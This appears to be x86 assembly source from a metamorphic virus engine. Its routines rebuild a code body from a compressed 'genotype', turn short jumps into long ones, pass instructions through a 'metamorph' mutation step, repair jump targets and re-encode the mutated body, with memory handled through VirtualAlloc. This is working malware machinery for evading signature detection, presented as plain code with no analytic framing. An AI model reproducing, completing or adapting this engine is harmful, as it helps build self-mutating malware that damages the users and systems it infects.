DEBUGOFF

build_body_from_genotype proc pascal
  LOCAL new_body:DWORD
       pushad

       mov eax,WORKSIZE
       call alloc
       mov [new_body],eax

       mov esi, ofs gens
       sub eax,[esi+4]
       lea edi,[eax+64*1024]      ;put unpacked distances in end of buffer
       call z_decode_asm

       mov eax,WORKSIZE*8
       call alloc
       mov [eip_table],eax

       mov eax,WORKSIZE
       call alloc
       mov [jmp_table],eax

       mov [eip_table_cnt],0
       mov [jmp_table_cnt],0

       mov esi,[new_body]
       xchg esi,edi

       mov [outbuffer],edi

       mov ebx,[CODE_OFS]
       mov [source],ebx

  @@build_body:
       sub eax,eax
       lodsw
       cmp ax, -1
       je @@done_build

       push esi
       cmp ax, -2               ;flags mark
       jne @@no_special_code

       lodsw                    ;flags value
       add dwo [esp],2
       btr eax, 15
       jnc @@no_special_code

       push -1
       pop esi          ;thats instruction have no equivalent in inbuffer
       call link_eip

       push eax
       mov ax, 0f481h           ;build XOR ESP
       stosw
       pop eax
       mov [registers],eax
       stosd
       jmp @@processed

  @@no_special_code:
       movsx esi,ax
       add ebx,esi
       mov esi,ebx
       call link_eip

       mov al,[esi]
       cmp al, 0ebh
       je @@short_shit                  ;is a small JMP/JCC
       and al, 011110000b
       cmp al, 70h
       jne @@no_short_shit

       mov al, 0fh
       mov ah, [esi]
       and ah,not 011110000b
       or ah, 80h

       stosw
       stosd

  @@embiggens:
       movsx edx,by [esi+1]
       lea eax,[edx+esi+2]
       sub eax,[source]

       push edi
       mov edi, [jmp_table_cnt]
       lea edi, [edi+edi*8]           ;offset of referenced instruction
       add edi, [jmp_table]
       stosd
       mov eax,[esp]
       stosd                          ;save patch point
       sub eax,eax
       stosb
       inc dwo [jmp_table_cnt]
       pop edi

       jmp @@processed

  @@short_shit:
       mov al, 0e9h
       stosb
       stosd
       jmp @@embiggens

  @@no_short_shit:
       call check4jmps
       jc @@processed

       call metamorph
       jc @@processed

       call disasm
       mov ecx,[disasm_size]
       rep movsb

  @@processed:
       pop esi
       jmp @@build_body


  @@done_build:
       push edi
       call fix_damn_jmps
       pop eax

       mov esi,[outbuffer]
       sub eax,esi
       mov [mutant_size],eax

       call alloc
       mov [mutant_offset],eax

       mov edi,eax
       mov ecx,[mutant_size]
       rep movsb

       mov ecx,[eip_table_cnt]

       lea eax,[ecx*4+8]
       call alloc
       mov edi,eax
       mov [userlist],edi

       mov esi,[eip_table]             ;table base
  @@create_userlist:
       lodsd
       stosd
       lodsd
       loop @@create_userlist

       push -1
       pop eax
       stosd

       push dwo [eip_table]
       call free
       push dwo [new_body]
       call free
       push dwo [jmp_table]
       call free

  @@error_exit:
       popad
       ret
build_body_from_genotype endp

alloc  proc
       pushad
       push PAGE_READWRITE
       push MEM_COMMIT+MEM_RESERVE
       push eax
       push 0
       call [_VirtualAlloc]
       mov [esp.Pushad_eax],eax
       popad
       ret
alloc  endp

free   proc
       pushad
       push MEM_RELEASE
       push 0
       push dwo [esp.cPushad.Arg1+8]
       call [_VirtualFree]
       popad
       ret 4
free   endp

build_genotype_from_body PROC
       pushad

       mov eax, WORKSIZE
       call alloc
       push eax
       mov edi,eax

       mov esi,[userlist]
       mov ebp,[mutant_offset]
       sub ebx,ebx
  @@distance_loop:
       lodsd
       cmp eax,-1
       je @@distance_done

       cmp wo [ebp+eax],0f481h           ;XOR ESP
       jne @@distance_store

       mov ecx,eax
       mov eax,-2
       stosw
       mov eax,[ebp+ecx+2]
       mov [registers],eax
       bts eax, 15
       stosw

       push edi
       lea edi,[ebp+ecx]

       call lea_dword
       jnc @@done_fill

       mov eax,90909090h
       stosd
       stosw

  @@done_fill:
       pop edi
       jmp @@distance_loop

  @@distance_store:
       sub eax,ebx
       add ebx,eax
       stosw
       jmp @@distance_loop

  @@distance_done:
       stc
       sbb eax,eax
       stosw

       mov ecx,edi
       mov esi,[esp]
       sub ecx,esi
       call z_encode_asm
       mov esi,edi
       mov eax,[edi]
       call alloc
       mov [mutant_gens],eax
       mov ecx,[edi]
       mov edi,eax
       rep movsb

       call free              ;free workmem

       mov eax,[userlist]
       push eax
       mov eax,[eax]
       mov [_1st_item],eax
       call free

       popad
       ret
build_genotype_from_body ENDP
